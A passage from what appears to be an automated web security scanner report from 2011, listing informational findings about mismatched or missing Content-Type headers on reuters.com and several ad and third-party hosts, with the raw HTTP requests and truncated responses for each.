GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 111
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
Expires: Sun, 04 Sep 2011 00:52:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:40 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback("xa=n; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

29.26. http://www.reuters.com/assets/breakingNews

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/breakingNews

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/breakingNews HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:36 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:26 GMT
Host: betaus.reuters.com
Age: 7
Vary: Accept-Encoding
Content-Length: 387
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF07 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:42:28 GMT and will
...[SNIP]...

29.27. http://www.reuters.com/assets/info

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/info

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/info HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:26 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:01 GMT
Age: 25
Vary: Accept-Encoding
Content-Length: 593
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF19 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:42:01 GMT and will
...[SNIP]...

29.28. http://www.reuters.com/assets/searchIntercept

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/searchIntercept HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:29 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:21:58 GMT
Content-Length: 694
Age: 270
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:21:58 GMT and will
...[SNIP]...

29.29. http://www.reuters.com/assets/sharedModuleLoader

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/sharedModuleLoader

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/sharedModuleLoader HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:31 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:26:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 213
Vary: Accept-Encoding
Connection: close

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: 5c2074b9-2f89-46a5-877e-a47d2dad08c6 <
...[SNIP]...

29.30. http://www.reuters.com/resources/r/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /resources/r/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /resources/r/ HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0
Vary: Accept-Encoding
Content-Length: 16
Connection: close
Content-Type: text/html

Illegal: d - msg

29.31. http://www.sprint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sprint.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=UTF-8. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097088|session#1315097027971-178294#1315098888|disable#browser%20timeout#1315100658

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:44 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Fri, 23 Apr 2010 11:54:19 GMT
ETag: "5e82c3-47e-484e6165730c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................................................................................ttt.......................................................
...[SNIP]...

29.32. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wunderground.com
Path:   /auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Issue detail

The response contains the following Content-type statement: Content-Type: text/xml. The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /auto/sacbeeXML/geo/WXCurrentObXML/index.xml HTTP/1.1
Host: www.wunderground.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.052
Connection: close
Content-Type: text/xml
Content-Length: 3577

   <current_observation>
       <credit>Weather Underground NOAA Weather Station</credit>
       <credit_URL>http://wunderground.com/</credit_URL>
       <termsofservice link="http://www.wunderground.com/members/tos.a
...[SNIP]...

30. Content type is not specified
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


30.1. http://load.tubemogul.com/core

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /core

Request

GET /core HTTP/1.1
Host: load.tubemogul.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Date: Sun, 04 Sep 2011 01:22:49 GMT
Connection: close
Content-Length: 14

Not Authorized

30.2. http://pcm3.map.pulsemgr.com/uds/pc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm3.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21280&sig=6f737abf3f6bb5f84a1ad1dc0be05ab8 HTTP/1.1
Host: pcm3.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sun, 04 Sep 2011 01:02:01 GMT
Connection: close

GIF89a.............!.......,...........D..;
